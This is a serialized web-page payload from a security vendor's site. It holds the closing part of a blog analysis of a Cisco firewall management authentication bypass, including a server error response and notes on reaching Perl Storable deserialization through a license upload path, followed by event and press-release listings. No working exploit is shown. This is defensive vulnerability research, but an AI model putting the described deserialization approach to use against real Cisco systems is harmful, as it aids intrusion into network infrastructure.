\u002Fusr\u002Flib64\u002Fperl5\u002F5.34.1\u002Fx86_64-linux\u002FStorable.pm line 421, at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm line 2069.\\n\"}}\n",[1277,6981,6982,6996,7005,7013,7021,7029,7038,7046,7054,7062,7070,7078,7086,7094,7102,7110,7118,7122],{"__ignoreMap":148},[1471,6983,6984,6986,6988,6990,6993],{"class":1473,"line":1474},[1471,6985,3153],{"class":2247},[1471,6987,55],{"class":1487},[1471,6989,3213],{"class":2328},[1471,6991,6992],{"class":2328}," 404",[1471,6994,6995],{"class":1527}," Not Found\n",[1471,6997,6998,7000,7002],{"class":1473,"line":149},[1471,6999,3224],{"class":3163},[1471,7001,1447],{"class":2247},[1471,7003,7004],{"class":1527}," Fri, 06 Mar 2026 15:35:42 GMT\n",[1471,7006,7007,7009,7011],{"class":1473,"line":1498},[1471,7008,3234],{"class":3163},[1471,7010,1447],{"class":2247},[1471,7012,3239],{"class":1527},[1471,7014,7015,7017,7019],{"class":1473,"line":1536},[1471,7016,3244],{"class":3163},[1471,7018,1447],{"class":2247},[1471,7020,3249],{"class":1527},[1471,7022,7023,7025,7027],{"class":1473,"line":1546},[1471,7024,3254],{"class":3163},[1471,7026,1447],{"class":2247},[1471,7028,3863],{"class":1527},[1471,7030,7031,7033,7035],{"class":1473,"line":1580},[1471,7032,3274],{"class":3163},[1471,7034,1447],{"class":2247},[1471,7036,7037],{"class":1527}," 
192\n",[1471,7039,7040,7042,7044],{"class":1473,"line":1612},[1471,7041,3284],{"class":3163},[1471,7043,1447],{"class":2247},[1471,7045,3289],{"class":1527},[1471,7047,7048,7050,7052],{"class":1473,"line":1624},[1471,7049,3294],{"class":3163},[1471,7051,1447],{"class":2247},[1471,7053,3299],{"class":1527},[1471,7055,7056,7058,7060],{"class":1473,"line":1648},[1471,7057,3304],{"class":3163},[1471,7059,1447],{"class":2247},[1471,7061,3309],{"class":1527},[1471,7063,7064,7066,7068],{"class":1473,"line":1654},[1471,7065,3314],{"class":3163},[1471,7067,1447],{"class":2247},[1471,7069,3319],{"class":1527},[1471,7071,7072,7074,7076],{"class":1473,"line":1662},[1471,7073,3324],{"class":3163},[1471,7075,1447],{"class":2247},[1471,7077,3329],{"class":1527},[1471,7079,7080,7082,7084],{"class":1473,"line":1673},[1471,7081,3334],{"class":3163},[1471,7083,1447],{"class":2247},[1471,7085,3339],{"class":1527},[1471,7087,7088,7090,7092],{"class":1473,"line":1681},[1471,7089,3344],{"class":3163},[1471,7091,1447],{"class":2247},[1471,7093,3349],{"class":1527},[1471,7095,7096,7098,7100],{"class":1473,"line":1691},[1471,7097,3354],{"class":3163},[1471,7099,1447],{"class":2247},[1471,7101,3359],{"class":1527},[1471,7103,7104,7106,7108],{"class":1473,"line":1699},[1471,7105,3364],{"class":3163},[1471,7107,1447],{"class":2247},[1471,7109,3369],{"class":1527},[1471,7111,7112,7114,7116],{"class":1473,"line":1705},[1471,7113,3194],{"class":3163},[1471,7115,1447],{"class":2247},[1471,7117,3378],{"class":1527},[1471,7119,7120],{"class":1473,"line":1733},[1471,7121,3383],{"emptyLinePlaceholder":54},[1471,7123,7124,7126,7128,7131,7133,7135,7137,7139,7141,7143,7145,7148,7150,7152],{"class":1473,"line":1773},[1471,7125,6014],{"class":1491},[1471,7127,1767],{"class":6017},[1471,7129,7130],{"class":6020},"error",[1471,7132,1767],{"class":6017},[1471,7134,5167],{"class":1491},[1471,7136,1767],{"class":6017},[1471,7138,1454],{"class":6030},[1471,7140,1767],{"class":6017},[1471,7142,1447],{"class":1491}
,[1471,7144,1767],{"class":6038},[1471,7146,7147],{"class":6041},"Error: Magic number checking on storable file failed at \u002Fusr\u002Flib64\u002Fperl5\u002F5.34.1\u002Fx86_64-linux\u002FStorable.pm line 421, at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm line 2069.",[1471,7149,5808],{"class":2257},[1471,7151,1767],{"class":6038},[1471,7153,6103],{"class":1491},[184,7155,7156,7157,7160,7161,1447],{},"Since the Storable module directly enables the ",[1277,7158,7159],{},"$Storable::Eval"," setting, there is a high likelihood that the module may be useful for attackers. The Storable module even calls this pattern out directly as ",[274,7162,7165],{"href":7163,"rel":7164},"https:\u002F\u002Fmetacpan.org\u002Fpod\u002FStorable#SECURITY-WARNING",[278],"potentially vulnerable",[184,7167,7168],{},[187,7169],{"alt":7170,"src":7171},"Storable serialization warning.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fstorable-warning.png",[184,7173,7174,7175,7178,7179,7181],{},"After examining Storable test cases and generating Storable data that was written via the license path, the team was eventually able to generate ",[1277,7176,7177],{},"CODE"," Perl-serialized data and interact with the ",[1277,7180,5541],{}," logic.  We were unable to find a sink or gadget that was a candidate for bootstrapping to code execution, however, before we found the installer path to RCE. 
It’s likely that some Perl wizard out there will be able to find an additional path to execution using this logic.",[184,7183,7184,7185,7190],{},"An exploit, PCAPs, a YARA rule, and network signatures for five different variants ",[274,7186,7189],{"href":7187,"rel":7188},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2026-03-20#cve-2026-20079-cisco-firewall-management-center-authentication-bypass",[278],"are available"," to VulnCheck Initial Access Intelligence customers for CVE-2026-20079.",[246,7192,302],{"id":301},[184,7194,7195,7196,1925,7201,7206,7207,1201],{},"VulnCheck’s Initial Access Intelligence team is always on the hunt for new exploits and fresh shells. By delivering machine-consumable, evidence-driven intelligence on new vulnerabilities and how real attackers can use them in the wild, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on inaccurate scores or delayed consensus. For more research like this, see ",[274,7197,7200],{"href":7198,"rel":7199},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fcisco-sd-wan-manager-vulns",[278],"Herding Cats: Recent Cisco SD-WAN Manager Vulnerabilities",[274,7202,7205],{"href":7203,"rel":7204},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Ftriofox-exploit-cve-2025-12480",[278],"Tales from the Exploit Mines: Gladinet Triofox CVE-2025-12480 RCE",", and ",[274,7208,7211],{"href":7209,"rel":7210},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423",[278],"Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423)",[184,7213,7214,7215,7220,7221,7226,7227,1925,7231,7206,7235,7239],{},"Sign up for the VulnCheck community today to get free access to our ",[274,7216,7219],{"href":7217,"rel":7218},"https:\u002F\u002Fwww.vulncheck.com\u002Fkev",[278],"VulnCheck KEV",", enjoy our comprehensive 
",[274,7222,7225],{"href":7223,"rel":7224},"https:\u002F\u002Fconsole.vulncheck.com\u002Fbrowse",[278],"vulnerability data",", and request a trial of our ",[274,7228,67],{"href":7229,"rel":7230},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Finitial-access-intelligence",[278],[274,7232,72],{"href":7233,"rel":7234},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fip-intelligence",[278],[274,7236,62],{"href":7237,"rel":7238},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fexploit-intelligence",[278]," products.",[7241,7242,7243],"style",{},"",{"title":148,"searchDepth":149,"depth":149,"links":7245},[7246,7249,7250,7251,7252,7253,7254,7255],{"id":1271,"depth":149,"text":1272,"children":7247},[7248],{"id":1348,"depth":1498,"text":1349},{"id":1380,"depth":149,"text":1381},{"id":1892,"depth":149,"text":1893},{"id":3665,"depth":149,"text":3666},{"id":4117,"depth":149,"text":4118},{"id":5483,"depth":149,"text":5484},{"id":6357,"depth":149,"text":6358},{"id":301,"depth":149,"text":302},"2026-03-26T17:00:00-05:00","VulnCheck's Initial Access Intelligence team analysis of CVE-2026-20079, an authentication bypass and remote code execution vulnerability in Cisco Secure Firewall Management 
Center.",{"slug":7259},"cisco-fmc-auth-bypass-cve-2026-20079","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079",{"title":1241,"description":7257},"blog\u002Fcisco-fmc-auth-bypass-cve-2026-20079",[331,7264],"vuln-intel","wvTtNWgRKq8KYAYbQkdRO_i8uIwp6Md9c-MtK1Z-a4w",[7267,7413,7444],{"id":7268,"title":7269,"authors":6,"body":7270,"date":7405,"description":7406,"extension":153,"featured":54,"image":7407,"meta":7408,"navigation":54,"path":7409,"seo":7410,"stem":7411,"__hash__":7412},"events\u002Fevents\u002Fmeet-vulncheck-at-vulncon-2026.md","Meet VulnCheck at VulnCon 2026",{"type":145,"value":7271,"toc":7403},[7272,7283,7290,7296,7317,7337,7356,7373,7393,7400],[184,7273,7274,7275,7278,7279,7282],{},"Join ",[478,7276,7277],{},"VulnCheck at CVE | FIRST Vulnerability Conference 2026 (VulnCon 2026) and Annual CNA Summit",", where the global vulnerability management community gathers to collaborate, exchange research, and advance the vulnerability ecosystem. The conference takes place ",[478,7280,7281],{},"April 13 - 16"," in Scottsdale, Arizona, bringing together researchers, vendors, and defenders working to improve how vulnerabilities are discovered, prioritized, and remediated.",[184,7284,7285,7286,7289],{},"VulnCheck is excited to serve as a ",[478,7287,7288],{},"Platinum Sponsor"," of VulnCon 2026.",[184,7291,7292,7295],{},[478,7293,7294],{},"VulnCheck Speaking Sessions:"," Our researchers and experts will be presenting multiple sessions during VulnCon 2026, sharing insights into vulnerability exploitation, CVE ecosystem dynamics, and vulnerability prioritization.",[184,7297,7298,7301,7304,7307,7308,7310,7313,7314,7316],{},[478,7299,7300],{},"Identifying Exploited and Likely-to-Be-Exploited Vulnerabilities",[7302,7303],"br",{},[478,7305,7306],{},"Speakers:"," Patrick Garrity, Wade Sparks ",[7302,7309],{},[478,7311,7312],{},"Date | Time:"," April 14 at 4:35 p.m. 
MT ",[7302,7315],{}," This session explores how VulnCheck identifies vulnerabilities that are actively exploited or likely to be exploited even before CVE assignment. The talk will walk through VulnCheck’s research workflow for correlating exploitation evidence from multiple intelligence sources, including exploit code, advisories, detection telemetry, and third-party threat intelligence, to identify gaps and coordinate CVE assignment when necessary. Attendees will learn how collaborative research can improve visibility into emerging threats and strengthen the vulnerability ecosystem.",[184,7318,7319,7322,7324,7327,7328,7330,7333,7334,7336],{},[478,7320,7321],{},"Women Belong in Cyber: The Women of FIRST SIG",[7302,7323],{},[478,7325,7326],{},"Speaker",": Khushali Dalal ",[7302,7329],{},[478,7331,7332],{},"Date | Time: April 15"," 4:30 p.m. MT ",[7302,7335],{},"\nJoin the Women of FIRST SIG for an informational session focused on building a more inclusive and supportive cybersecurity community. This group of gender-diverse security practitioners is dedicated to advancing the participation of women in cybersecurity through mentorship, knowledge sharing, and networking. Learn how the SIG supports individuals at every stage, from students and early-career professionals to those re-entering the workforce, and how you can get involved in helping close the gender gap in the industry.",[184,7338,7339,7342,7344,7347,7348,7350,7352,7353,7355],{},[478,7340,7341],{},"The Myth of the Meteoric Rise in Vulnerabilities",[7302,7343],{},[478,7345,7346],{},"Speaker:"," Scott Moore ",[7302,7349],{},[478,7351,7312],{}," April 16 at 10:30 a.m. MT ",[7302,7354],{},"\nThis session challenges the common narrative that rising vulnerability counts reflect declining software security. 
While CVE disclosures increased significantly in recent years, the rise is often influenced by reporting incentives, expanded coverage across ecosystems, and academic initiatives, rather than a direct increase in exploitable risk. Scott Moore will examine the structural drivers behind CVE growth and explain how inflated counts can distort risk perception, misdirect remediation efforts, and obscure real progress in secure development.",[184,7357,7358,7361,7363,7365,7366,7368,7352,7370,7372],{},[478,7359,7360],{},"AI Is Writing Your Bug Reports. Can You Tell?",[7302,7362],{},[478,7364,7346],{}," Khushali Dalal ",[7302,7367],{},[478,7369,7312],{},[7302,7371],{}," In this interactive session, attendees will evaluate real-world–inspired vulnerability reports and determine whether they were written by a human researcher, generated by AI, or created through a hybrid approach. As the session progresses, additional context will be revealed: missing proof-of-concept details, contradictory technical claims, hallucinated CVEs, reused templates, and subtle credibility signals. The audience will vote and debate in real time, followed by guided analysis on how PSIRT teams distinguish signal from noise when AI is involved. Rather than framing AI as purely a problem or solution, this talk focuses on practical detection methods, validation strategies, and process adaptations security teams can implement today. It also highlights real decision-making challenges and lessons learned from live vulnerability response programs.",[184,7374,7375,7378,7380,7383,7384,7386,7389,7390,7392],{},[478,7376,7377],{},"Panel: Supply Chains and Malware Campaigns: Is CVE the Right Way to Name the Game?",[7302,7379],{},[478,7381,7382],{},"Panelist:"," Caitlin Condon ",[7302,7385],{},[478,7387,7388],{},"Date | Time: April 16"," at 1:15 p.m. MT ",[7302,7391],{}," This panel examines the role of CVE identifiers in tracking vulnerabilities tied to supply-chain compromises and malware campaigns. 
The discussion will bring together multiple perspectives from across the vulnerability ecosystem to explore the future of vulnerability identification and coordination.",[184,7394,7395,7396,7399],{},"Beyond attending our speaking sessions, be sure to visit our ",[478,7397,7398],{},"exhibit table on April 14 and 15"," to meet the team, explore the latest research on vulnerability exploitation, and discover how our exploit intelligence can help organizations focus on the vulnerabilities that truly matter.",[184,7401,7402],{},"Don’t miss this chance to connect with our experts and see firsthand how we are helping organizations stay ahead of evolving cyber threats.",{"title":148,"searchDepth":149,"depth":149,"links":7404},[],"2026-04-13","Join VulnCheck at CVE | FIRST Vulnerability Conference 2026 (VulnCon 2026) and Annual CNA Summit, where the global vulnerability management community gathers to collaborate, exchange research, and advance the vulnerability ecosystem. The conference takes place April 13 - 16 in Scottsdale, Arizona, bringing together researchers, vendors, and defenders working to improve how vulnerabilities are discovered, prioritized, and remediated.","events\u002Fvulncon.jpg",{},"\u002Fevents\u002Fmeet-vulncheck-at-vulncon-2026",{"title":7269,"description":7406},"events\u002Fmeet-vulncheck-at-vulncon-2026","iIQac9O6KPYzC6j47uI-cZWPsNQ_ETcz6A2weTGF9D4",{"id":7414,"title":7415,"authors":6,"body":7416,"date":7437,"description":7423,"extension":153,"featured":7438,"image":6,"meta":7439,"navigation":54,"path":7440,"seo":7441,"stem":7442,"__hash__":7443},"events\u002Fevents\u002Fjoin-the-vulncheck-team-in-san-francisco.md","Join the VulnCheck Team in San Francisco for Meetings and Dinners",{"type":145,"value":7417,"toc":7435},[7418,7421,7424,7432],[184,7419,7420],{},"VulnCheck is heading to San Francisco from March 23 - 26, 2026, and we are looking forward to connecting with friends, partners, and security leaders while we are in 
town.",[184,7422,7423],{},"Throughout the week, we will be hosting a series of exclusive dinners and private, invite-only meetings, designed for meaningful conversations around emerging vulnerabilities, threat intelligence, and what’s next for proactive security teams.",[184,7425,7426,7427,7431],{},"Want in? Email us at ",[274,7428,7430],{"href":7429},"mailto:events@vulncheck.com","events@vulncheck.com"," to secure your spot.",[184,7433,7434],{},"See you in SF!",{"title":148,"searchDepth":149,"depth":149,"links":7436},[],"2026-03-23",false,{},"\u002Fevents\u002Fjoin-the-vulncheck-team-in-san-francisco",{"title":7415,"description":7423},"events\u002Fjoin-the-vulncheck-team-in-san-francisco","KoAgSvLK7xSy7VwMiLTChjNXbwlYPq2TeuYTJ6uS8Ss",{"id":7445,"title":7446,"authors":7447,"body":7453,"date":7490,"description":7491,"extension":153,"featured":7438,"image":6,"meta":7492,"navigation":54,"path":7493,"seo":7494,"stem":7495,"__hash__":7496},"events\u002Fevents\u002Fwicys-2026.md","VulnCheck is Sponsoring WiCyS 2026",[7448],{"name":7449,"avatar":7450,"link":7451,"linkName":7452},"Anthony Bettini","https:\u002F\u002Fwww.vulncheck.com\u002Flogo.png","https:\u002F\u002Fwww.vulncheck.com","VulnCheck",{"type":145,"value":7454,"toc":7488},[7455,7462,7465,7468,7477],[184,7456,7457,7458,7461],{},"VulnCheck is proud to be a Gold sponsor of ",[478,7459,7460],{},"WiCyS 2026",", which takes place March 11-13.",[184,7463,7464],{},"The premier event dedicated to advancing women and underrepresented professionals in cybersecurity. 
WiCyS brings together practitioners, leaders, recruiters, and innovators from across the public and private sectors to foster connection, career growth, and community impact.",[184,7466,7467],{},"At WiCyS 2026, VulnCheck looks forward to engaging in meaningful conversations around vulnerability intelligence, mission-driven security work, and the future of the cyber workforce.",[184,7469,7470,7471,7476],{},"Be sure to connect with the VulnCheck team to learn what’s new and how you can be part of our growing mission. We are always looking for passionate, talented individuals to join us; visit our ",[274,7472,7475],{"href":7473,"rel":7474},"https:\u002F\u002Fwww.vulncheck.com\u002Fcareers",[278],"careers page"," to learn more.",[184,7478,7479,7480,7482,7483,1201],{},"Learn more about ",[478,7481,7460],{}," and register on the ",[274,7484,7487],{"href":7485,"rel":7486},"https:\u002F\u002Fwww.wicys.org\u002Fevents\u002Fwicys-2026\u002F",[278],"WiCyS website",{"title":148,"searchDepth":149,"depth":149,"links":7489},[],"2026-03-11","VulnCheck is proud to be a Gold sponsor of WiCyS 2026, which takes place March 11-13. 
The premier event dedicated to advancing women and underrepresented professionals in cybersecurity.",{},"\u002Fevents\u002Fwicys-2026",{"title":7446,"description":7491},"events\u002Fwicys-2026","rJhjMM_j_bxZHaRrbDCmPuCDrw51G98d-Gol5b4Cr5c",[7498,7612,7735],{"id":7499,"title":7500,"articles":6,"authors":7501,"body":7504,"date":7605,"description":7606,"extension":153,"meta":7607,"navigation":54,"path":7608,"seo":7609,"stem":7610,"__hash__":7611},"press\u002Fpress\u002Freal-world-exploit-report.md","VulnCheck Exploit Intelligence Report Separates Real-World Exploitation Activity from Theoretical Vulnerability Risk",[7502],{"name":7449,"avatar":7503},"\u002Fteam\u002Fanthony-bettini.jpg",{"type":145,"value":7505,"toc":7601},[7506,7520,7523,7531,7534,7548,7555,7562,7569,7571,7590,7594],[184,7507,7508,7511,7512,7511,7515,7519],{},[478,7509,7510],{},"LEXINGTON, Mass."," — ",[478,7513,7514],{},"February 25, 2026",[274,7516,7452],{"href":7517,"rel":7518},"https:\u002F\u002Fwww.vulncheck.com\u002F",[278],", the exploit intelligence company, today released the 2026 VulnCheck Exploit Intelligence Report (VEIR), a first-of-its-kind analysis of real-world exploitation trends and attacker behavior, along with its inaugural list of the 50 most routinely targeted vulnerabilities of the past year. By separating vulnerability disclosure data from confirmed exploitation, the report is designed to help security teams prioritize remediation based on operational risk instead of raw volume.",[184,7521,7522],{},"The VEIR shows that while CVE disclosures and public proof-of-concept code increased significantly in 2025, just 1% of vulnerabilities were confirmed to be exploited in the wild, with a small subset driving disproportionate real-world impact. The report is based on data from over two dozen unique VulnCheck indices, more than 500 data sources and proprietary first-party intelligence. 
It examines attacker behavior and which vulnerabilities drove confirmed compromise during a year marked by AI-generated exploit code, geopolitical tension and uncertainty surrounding core vulnerability programs.",[7524,7525,7528],"author-quote",{"author":7526,"position":7527},"Jacob Baines","Chief Technology Officer, VulnCheck",[184,7529,7530],{},"The data shows that exploitation is concentrated in a very small number of vulnerabilities, but those vulnerabilities are being weaponized faster and at greater scale. At the same time, the volume of exploit content, much of it AI-generated slop, is making it harder to distinguish real operational risk from background noise.",[184,7532,7533],{},"In 2025, VulnCheck tracked more than 14,400 exploits developed for 10,480 unique 2025 CVEs, a 16.5% year-over-year increase in same-year exploit coverage. Much of that growth was associated with AI-generated proof-of-concept code, including nonfunctional or misleading exploit content. Other key findings from the 2026 VEIR report include:",[227,7535,7536,7539,7542,7545],{},[230,7537,7538],{},"56.4% of 2025 ransomware CVEs were first identified through active zero-day exploitation, and roughly one-third still lacked public or commercial exploits as of January 2026",[230,7540,7541],{},"A 13% decrease in new vulnerabilities linked to named state-sponsored groups overall, with China-linked exploit attributions increasing and Iranian-linked activity decreasing",[230,7543,7544],{},"884 vulnerabilities were added to VulnCheck’s Known Exploited Vulnerabilities dataset with 47.7% carrying 2025 CVE identifiers",[230,7546,7547],{},"Deep dives into React2Shell, SharePoint exploitation, and ransomware groups including Cl0p, DragonForce, Earth Lamia, and RomCom.",[7524,7549,7552],{"author":7550,"position":7551},"Caitlin Condon","Vice President of Research, VulnCheck",[184,7553,7554],{},"Organizations are managing more disclosures than ever, but only a small fraction of those vulnerabilities see 
active exploitation. The difficulty is identifying that fraction early enough to act. This analysis focuses on confirmed exploitation trends to improve prioritization decisions.",[184,7556,7557,7558,1201],{},"The report also includes VulnCheck’s first-ever Routinely Targeted Vulnerabilities list, a rankable set of 50 CVEs disclosed and exploited in 2025 that demonstrated sustained attacker interest. The list is also available separately, along with associated metadata. See the ",[274,7559,7561],{"href":7560},"\u002F2025-routinely-targeted-vulnerabilities","full list here",[184,7563,7564,7565,1201],{},"The 2026 VulnCheck Exploit Intelligence Report is ",[274,7566,7568],{"href":120,"rel":7567,"target":93},[278],"available here",[246,7570,302],{"id":301},[184,7572,7573,7574,1883,7579,7584,7585,1201],{},"VulnCheck closes the exploitation-timing gap by enabling security teams to operate on attacker timelines instead of disclosure timelines. By delivering machine-consumable, evidence-driven intelligence on when vulnerabilities become exploitable and how attackers actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on scores or delayed consensus. Follow the company on ",[274,7575,7578],{"href":7576,"rel":7577},"https:\u002F\u002Fwww.linkedin.com\u002Fcompany\u002Fvulncheck\u002F?viewAsMember=true",[278],"LinkedIn",[274,7580,7583],{"href":7581,"rel":7582},"https:\u002F\u002Fx.com\u002Fvulncheckai",[278],"X",". 
To learn more about VulnCheck, visit ",[274,7586,7589],{"href":7587,"rel":7588},"https:\u002F\u002Fvulncheck.com\u002F",[278],"https:\u002F\u002Fvulncheck.com",[246,7591,7593],{"id":7592},"media-contacts","Media Contacts",[184,7595,7596,7597],{},"Jason Vancura\nMarketbridge for VulnCheck\n",[274,7598,7600],{"href":7599},"mailto:vulncheck@marketbridge.com","vulncheck@marketbridge.com",{"title":148,"searchDepth":149,"depth":149,"links":7602},[7603,7604],{"id":301,"depth":149,"text":302},{"id":7592,"depth":149,"text":7593},"2026-02-25","Analysis Finds 1% of Vulnerabilities Were Exploited in the Wild in 2025 and Identifies the 50 Most Routinely Targeted Flaws of Last Year",{},"\u002Fpress\u002Freal-world-exploit-report",{"title":7500,"description":7606},"press\u002Freal-world-exploit-report","2qs6UzepF_mzu5lZNbLHsopOx9X2Pei3k8z4aasDvgc",{"id":7613,"title":7614,"articles":7615,"authors":7620,"body":7626,"date":523,"description":7727,"extension":153,"meta":7728,"navigation":54,"path":7731,"seo":7732,"stem":7733,"__hash__":7734},"press\u002Fpress\u002Fvulncheck-joins-operational-technology-cybersecurity-coalition.md","VulnCheck Joins Operational Technology Cybersecurity Coalition to Advance Real-Time Exploit Intelligence",[7616],{"title":7617,"source":7618,"link":7619,"date":7605},"VulnCheck joins OT Cybersecurity Coalition to bolster industrial exploit intelligence, boost vulnerability prioritization","Industrial Cyber","https:\u002F\u002Fwww.vulncheck.com\u002Fpress\u002Fvulncheck-joins-operational-technology-cybersecurity-coalition",[7621],{"name":7622,"avatar":7623,"link":7624,"linkName":7625},"Tom Bain","\u002Fteam\u002Fthomas-bain.jpg","https:\u002F\u002Ftwitter.com\u002Ftmbainjr1","@tmbainjr1",{"type":145,"value":7627,"toc":7723},[7628,7644,7651,7654,7660,7663,7670,7673,7683,7687,7690,7698,7700,7714],[184,7629,7630,7633,7634,7639,7640,7643],{},[478,7631,7632],{},"WASHINGTON, D.C. and LEXINGTON, Mass — Feb. 
24, 2026 —"," ",[274,7635,7638],{"href":7636,"rel":7637},"https:\u002F\u002Fwww.otcybercoalition.org\u002F",[278],"The Operational Technology Cybersecurity Coalition"," (OTCC) and ",[274,7641,7452],{"href":7451,"rel":7642},[278]," today announced that VulnCheck has joined the coalition as its newest member, expanding efforts to strengthen the cybersecurity of operational technology (OT) environments and protect critical infrastructure as threats targeting industrial control systems and network-edge devices continue to increase.",[7524,7645,7648],{"author":7646,"position":7647},"Arun Chetty","Vice President at National Grid Partners",[184,7649,7650],{},"There is growing urgency within the critical infrastructure segment to modernize how we prioritize and address potential software vulnerabilities. It’s clear that attackers are moving faster than defenders can triage flaws, and VulnCheck provides continuously updated intelligence at machine speed and with more precision than any other organization we’ve seen. VulnCheck's contribution to the OTCC's efforts in safeguarding critical infrastructure will enrich the global intelligence ecosystem.",[184,7652,7653],{},"The OTCC focuses on improving OT security and advancing policies that strengthen critical infrastructure resilience. Representing the entire OT lifecycle, the OT Cyber Coalition believes that the strongest, most effective approach to securing our nation’s critical infrastructure is one that is open, vendor-neutral, and allows for diverse solutions and information sharing without compromising cybersecurity defenses. VulnCheck delivers threat intelligence solutions that power cybersecurity products and critical response workflows used to protect the global economy, critical infrastructure, enterprises and governments. 
By joining OTCC, VulnCheck strengthens the group’s ability to ground policy discussions and infrastructure defense strategies in current threat activity.",[7524,7655,7657],{"author":7449,"position":7656},"Founder and CEO at VulnCheck",[184,7658,7659],{},"Network-edge devices, particularly in OT environments, are among the most highly targeted assets. Greater visibility into exploited flaws and active threats is essential to helping defenders reduce risk in critical infrastructure environments. Through OTCC membership, we can help ensure policymakers and operators have access to timely, actionable exploit intelligence that reflects real-world activity.",[184,7661,7662],{},"VulnCheck provides machine-readable exploit intelligence to help organizations identify and prioritize vulnerabilities that pose an active risk. Its platform analyzes first-party evidence of exploitation and reviews more than 500 million records across all known CVEs from over 500 sources to surface actionable intelligence. Data sources are refreshed multiple times per day, providing updated context on threat actor activity, ransomware associations and publicly available exploit proof-of-concept code. Automating this analysis removes operational bottlenecks and enables security teams to respond more quickly to emerging threats.",[7524,7664,7667],{"author":7665,"position":7666},"Tatyana Bolton","Executive Director, OTCC",[184,7668,7669],{},"Operational technology environments face increasingly sophisticated and persistent threats. Adding VulnCheck’s exploit intelligence capabilities strengthens the coalition’s collective ability to inform data-driven public policy discussions and support organizations responsible for securing critical infrastructure.",[184,7671,7672],{},"VulnCheck will participate in S4x26, a conference focused on industrial control systems and operational technology security. 
VulnCheck representatives will be available onsite, including during the Premium Cabana Session on Wednesday, Feb. 25, from 1 p.m. to 4:30 p.m. ET.",[184,7674,7675,7676,7679,7680,1201],{},"To learn more about OTCC and its members, visit ",[274,7677,7636],{"href":7636,"rel":7678},[278],". To learn more about VulnCheck and its exploit and vulnerability intelligence offerings, visit ",[274,7681,7517],{"href":7517,"rel":7682},[278],[246,7684,7686],{"id":7685},"about-the-operational-technology-cybersecurity-coalition","About the Operational Technology Cybersecurity Coalition",[184,7688,7689],{},"The OTCC is a diverse group of cybersecurity stakeholders dedicated to improving the cybersecurity of operational technology environments and strengthening public policy to secure critical infrastructure across the country.",[184,7691,7692,7693],{},"For more information, visit: ",[274,7694,7697],{"href":7695,"rel":7696},"https:\u002F\u002Fwww.otcybercoalition.orgAbout",[278],"https:\u002F\u002Fwww.otcybercoalition.org",[246,7699,302],{"id":301},[184,7701,7702,7703,7705,7706,1883,7710,1201],{},"VulnCheck closes the exploitation-timing gap by enabling security teams to operate on attacker timelines instead of disclosure timelines. By delivering machine-consumable, evidence-driven intelligence on when vulnerabilities become exploitable and how attackers actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation ",[7302,7704],{},"\nwithout relying on scores or delayed consensus. 
Follow the company on ",[274,7707,7578],{"href":7708,"rel":7709},"https:\u002F\u002Fcts.businesswire.com\u002Fct\u002FCT?id=smartlink&url=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fvulncheck%2F%3FviewAsMember%3Dtrue&esheet=54371212&newsitemid=20251207656200&lan=en-US&anchor=LinkedIn&index=5&md5=2cc19508986bfa8f455300e468428594",[278],[274,7711,7583],{"href":7712,"rel":7713},"https:\u002F\u002Fcts.businesswire.com\u002Fct\u002FCT?id=smartlink&url=https%3A%2F%2Fx.com%2Fvulncheckai&esheet=54371212&newsitemid=20251207656200&lan=en-US&anchor=X&index=6&md5=3cbb2e44b6fc035002323f68f420d735",[278],[184,7715,7716,7717,7721],{},"To learn more about VulnCheck, visit ",[274,7718,7589],{"href":7719,"rel":7720},"https:\u002F\u002Fcts.businesswire.com\u002Fct\u002FCT?id=smartlink&url=https%3A%2F%2Fvulncheck.com%2F&esheet=54371212&newsitemid=20251207656200&lan=en-US&anchor=https%3A%2F%2Fvulncheck.com%2F&index=7&md5=80ab20d77eb3e068827df9bfa30f3792",[278],[478,7722,1201],{},{"title":148,"searchDepth":149,"depth":149,"links":7724},[7725,7726],{"id":7685,"depth":149,"text":7686},{"id":301,"depth":149,"text":302},"Partnership expands collaboration to strengthen operational technology security and critical infrastructure protection",{"type":7729,"slug":7730},"press","vulncheck-joins-operational-technology-cybersecurity-coalition","\u002Fpress\u002Fvulncheck-joins-operational-technology-cybersecurity-coalition",{"title":7614,"description":7727},"press\u002Fvulncheck-joins-operational-technology-cybersecurity-coalition","b_M1ymwra6xS9w6TxHFulxxO_SNl6lPQeOQya21vLGc",{"id":7736,"title":7737,"articles":7738,"authors":7739,"body":7741,"date":7812,"description":7813,"extension":153,"meta":7814,"navigation":54,"path":7816,"seo":7817,"stem":7818,"__hash__":7819},"press\u002Fpress\u002Fvulncheck-establishes-emea-headquarters-in-cheltenham-uk-amid-soaring-global-demand-for-exploit-intelligence.md","VulnCheck Establishes EMEA Headquarters in Cheltenham, UK Amid Soaring Global Demand for Exploit 
